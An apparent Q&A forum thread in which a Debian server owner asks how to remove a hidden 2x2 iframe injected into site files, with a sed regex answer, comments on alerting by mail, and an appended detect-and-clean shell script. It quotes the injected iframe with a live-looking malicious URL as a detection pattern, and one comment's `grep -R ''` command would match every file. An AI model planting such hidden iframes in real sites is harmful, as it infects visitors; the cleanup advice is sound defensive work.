We're running a Debian server and we have malware or something doing code injection.

I know how to search and replace this string:

```
<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>
```

I do it this way:

```
find /home -type f | xargs sed -i 's$<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>$ $g'
```

My problem is the URL http://ingvar2000.no-ip.org/jc/rss.php changes from file to file, so how can I search and replace:

```
<iframe src="ANY STRING HERE" width="2" height="2" frameborder="0"></iframe>
```

Because the width, height, and frameborder are always the same.

j0k
Docteur_K
  • Your site's compromised. Redeploy it from a pristine copy, and then fix the security problem that caused this in the first place. – Michael Hampton Mar 01 '13 at 14:23
  • Yes, I sure will, but I can't and I have to find someone to do it. Until then, this little fix will avoid the site being listed as malicious by Google. At least I hope so... – Docteur_K Mar 01 '13 at 14:45
  • This little fix will be undone quickly by whoever hacked your site in the first place. – ceejayoz Mar 01 '13 at 15:18
  • I know, but again, I can't manage this by myself. I'm a front-end ActionScript 3 developer, not bad at all, but I don't know anything about sysadmin... So until I find someone, I do what I can :( But still, thank you for caring, it's very nice of you, and be sure I'll do my best to reinstall everything as soon as possible :) – Docteur_K Mar 01 '13 at 16:17

1 Answer

Use:

```
# -print0 / -0 keep file names that contain spaces or newlines intact
find /home -type f -print0 | xargs -0 sed -i 's$<iframe src="[^"]*" width="2" height="2" frameborder="0"></iframe>$ $g'
```

Here `[^"]*` means 0 or more characters of anything but `"`.

Stone
  • Awesome, thank you very much for your quick and very efficient response! I might ask for too much, but do you know if it's possible to send an email if the requested string is found? Thanks again, you saved my day! Frederic. – Docteur_K Mar 01 '13 at 14:41
  • You're welcome! Just run another script before this to walk through all files and e-mail you all the matched files. Like: `grep -R '' /home | mail -s "Alert" your@address.com` – Stone Mar 01 '13 at 15:12
  • One more time, thanks! And since I'm French and we don't really mind abusing people helping ^^ Do you know if it's possible to send the email only if a file matched? Thanks again a thousand times, it's very kind of you :) – Docteur_K Mar 01 '13 at 16:15
  • You can redirect the `grep` to a file and then check if the file exists and only if it exists send the letter. – Stone Mar 05 '13 at 20:13
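
The detect, alert-only-on-match and clean flow discussed in this thread, as an added example that is not part of the original answer or comments. It assumes GNU grep and xargs as shipped on Debian; the function names and the `MAILER` variable are hypothetical, and the mailer is assumed to accept `-s SUBJECT RECIPIENT` with the body on stdin, as `mail` does.

```shell
#!/bin/sh
# Added example (not from the thread). Pattern taken from the answer:
# the changing URL is matched by [^"]*, the fixed attributes literally.
PATTERN='<iframe src="[^"]*" width="2" height="2" frameborder="0"></iframe>'

# List every text file under $1 that contains the injected iframe.
# -r recurse, -l file names only, -I skip binaries; the backups written
# by clean_injected are excluded so they do not re-trigger alerts.
find_injected() {
    grep -rlI --exclude='*.bak' -- "$PATTERN" "$1" 2>/dev/null
}

# Mail the list of infected files to $2, but only if something matched.
# Returns 1 (and sends nothing) when the tree is clean.
alert_if_found() {
    matches=$(find_injected "$1") || true
    [ -n "$matches" ] || return 1
    # MAILER is an assumption of this example; it defaults to mail(1).
    printf '%s\n' "$matches" | ${MAILER:-mail} -s "Injected iframe found" "$2"
}

# Strip the iframe from the matched files only (not from every file under
# the tree), NUL-separated so odd file names survive. Each changed file
# keeps a .bak copy of the original bytes for later investigation.
clean_injected() {
    grep -rlI --null --exclude='*.bak' -- "$PATTERN" "$1" 2>/dev/null |
        xargs -0 -r sed -i.bak "s|$PATTERN||g"
}
```

Run from cron, `alert_if_found /home you@example.invalid && clean_injected /home` sends one mail per infected scan and stays silent otherwise; the `.bak` files should be moved out of the web root once collected.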